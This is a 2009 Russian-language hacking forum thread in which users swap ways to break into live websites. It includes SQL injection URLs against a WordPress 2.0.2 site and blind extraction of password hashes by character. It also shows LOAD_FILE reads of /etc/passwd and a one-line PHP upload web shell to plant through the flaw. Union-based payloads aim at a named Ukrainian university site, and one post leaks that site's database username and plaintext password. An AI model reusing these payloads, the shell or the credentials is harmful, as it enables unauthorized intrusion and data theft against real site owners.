24.10.2009, 20:08
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Pashkela
у joomla обычно админка в administrator
Вывод сделал опираясь на это 
|
|
|
24.10.2009, 20:41
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
Да эт джумла.
/**
* CSS Document for offline page
* @version $Id: error.css 10387 2008-06-03 10:59:16Z pasamio $
* @package Joomla
* @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software and parts of it may contain or be derived from the
* GNU General Public License or other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
/* Start Common Styles */
и такая фигня иногда выскакивает
Вы не можете посетить текущую страницу потому, что:
1. просроченная закладка/избранное
2. поисковый механизм, у которого просрочен список для этого сайта
3. пропущен адрес
4. у вас нет прав на эту страницу
5. Запрашиваемый ресурс не был найден.
6. В процессе обработки вашего запроса произошла ошибка.
Пожалуйста, попробуйте одну из следующих страниц:
* Домашняя страница
Если у вас возникли сложности, пожалуйста, свяжитесь с Администратором этого сайта.
Последний раз редактировалось Krist_ALL; 24.10.2009 в 20:43..
|
|
|
|
24.10.2009, 21:10
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами:
9231812
Репутация:
40
|
|
Народ, ситуация такая:
на вордпрессе 2.0.2 нашёл sql-injection:
www.site.ru/?page_id=400&cat=-15+or+1=(select+1)/*
В ответ на это:
WordPress database error: [You have an error in your SQL syntax near 'select 1)/* AND crnt.category_id = 16' at line 5]
SELECT crnt.post_id FROM wp_post2cat crnt LEFT JOIN wp_post2cat as cat2 USING(post_id) WHERE cat2.category_id =-15 or 1=(select 1)/* AND crnt.category_id = 16
И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*
Как тут можно получить пароль из wp_users?
---
Вопрос снят. Ответ - Никак
Последний раз редактировалось _gr34t; 25.10.2009 в 11:39..
|
|
|
|
24.10.2009, 22:17
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Сообщение от _gr34t
Народ, ситуация такая:
на вордпрессе 2.0.2 нашёл sql-injection:
www.site.ru/?page_id=400&cat=-15+or+1=(select+1)/*
В ответ на это:
И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*
Как тут можно получить пароль из wp_users?
---
Вопрос снят 3 мускул ,мда редкий зверь .
без поддержки обьединения запросов посредством UNION ,+ при запросах типа SELECT,ни подзапросов
|
|
|
|
25.10.2009, 16:43
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Сообщение от _gr34t
И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*
Как тут можно получить пароль из wp_users?
---
Вопрос снят. Ответ - Никак погоди с выводами.
таблица "wp_users" имеет поле :
user_pass(по дефолту),если найденная тобой скуля работает с таблице пользователей =>подбирай колонку с паролем пользователя, а затем и сам пароль.
колонку с паролем:
Код:
profile.php?id=2+and+length(user_pass)>0
пароль:
Код:
id=2+and+ascii(substring(user_pass,1,1))>127
^Посимвольным перебором.
вот замечательная статья Grey'a - Работа с инъекциями в MySQL третьей версии.
|
|
|
|
25.10.2009, 22:07
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами:
9231812
Репутация:
40
|
|
Сообщение от L I G A
погоди с выводами.
таблица "wp_users" имеет поле :
user_pass(по дефолту),если найденная тобой скуля работает с таблице пользователей =>подбирай колонку с паролем пользователя, а затем и сам пароль.
колонку с паролем:
Код:
profile.php?id=2+and+length(user_pass)>0
пароль:
Код:
id=2+and+ascii(substring(user_pass,1,1))>127
^Посимвольным перебором.
вот замечательная статья Grey'a - Работа с инъекциями в MySQL третьей версии.
Спасибо за ответ.
Статья и правда замечательная, вчера её прочитал. Из неё и понял, что моя скуля почти бесполезна
В запросе не используется таблица wp_users:
SELECT crnt.post_id FROM wp_post2cat crnt LEFT JOIN wp_post2cat as cat2 USING(post_id) WHERE cat2.category_id =15 or 3=substring(version(),1,1) -- f AND crnt.category_id = 16
LOAD_FILE('/etc/passwd') - работает, можно посимвольно читать.
Но LOAD_FILE('/ip/site/www/wp-config.php') - уже не работает. На сколько я понимаю, права на чтение для папки /ip/site/www/ стоят только для апача (.
Буду искать дальше
|
|
|
|
24.10.2009, 21:41
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами:
9231812
Репутация:
40
|
|
M1ks, если file_upload=On, то можно намного проще сделать.
Заливаешь через свою уязвимость
PHP код:
<?php if($_FILES[upfile]){if(!move_uploaded_file($_FILES[upfile][tmp_name], $_FILES[upfile][name]))die();}?><form method=POST enctype=<?php echo chr(39);?>multipart/form-data<?php echo chr(39);?>><input type=file name=upfile><input type=Submit></form>
И заливаешь любой файл со своего компа
Последний раз редактировалось _gr34t; 25.10.2009 в 11:42..
|
|
|
|
24.10.2009, 22:09
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
ребята подскажите где лежыт PHP.ini на linux по умолчанию!!!???
Strilo4ka, смотря какая ОС и как сервер настроен.
/etc/php.ini (Red Hat Linux, SuSE / Novell Linux)
/etc/php4/apache/php.ini (Debian woody and sarge, Ubuntu 6.10 с php4 и apache 1.3)
/etc/php5/apache2/php.ini (Ubuntu 6.10 с php5 и apache2, Debian etch)
/etc/httpd/php.ini (Trustix Secure Linux 3.0)
/usr/local/php/lib/php.ini (Mac OS X использующий пакет Marc Liyanage's PHP)
/etc/apache/php.ini (Slackware 10.x)
/var/www/conf/php.ini (OpenBSD)
/usr/local/etc/php.ini (FreeBSD)
/usr/pkg/etc/php.ini (NetBSD)
Gentoo Linux:
/etc/php/apache2-php4/php.ini
/etc/php/cli-php4/php.ini
/etc/apache2/php.ini
|
|
|
|
24.10.2009, 22:34
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Код:
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+1,load_file(0x2f6574632f7068702e696e69),3,4,5--+
используй load_file()
Далее манимулируй для полного вывода данных.
ВСЕ можна вывести через первый столбец:
Код:
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7068702e696e69),2,3,4,5--+
|
|
|
|
25.10.2009, 04:49
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
может так легче?
http://www.univd.edu.ua/serverdb.inc
Код:
?php
//$server = "80.73.1.156";
$server = "localhost";
$user = "univd";
$pwd = "biohazard";
//$server = "localhost:3306";
//$user = "cardinal";
//$pwd = "cfiekz";
$con = mysql_connect($server, $user, $pwd);
mysql_select_db("univd", $con);
$maxbook = 10;
?>
http://www.univd.edu.ua/dumper/dumper.php
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
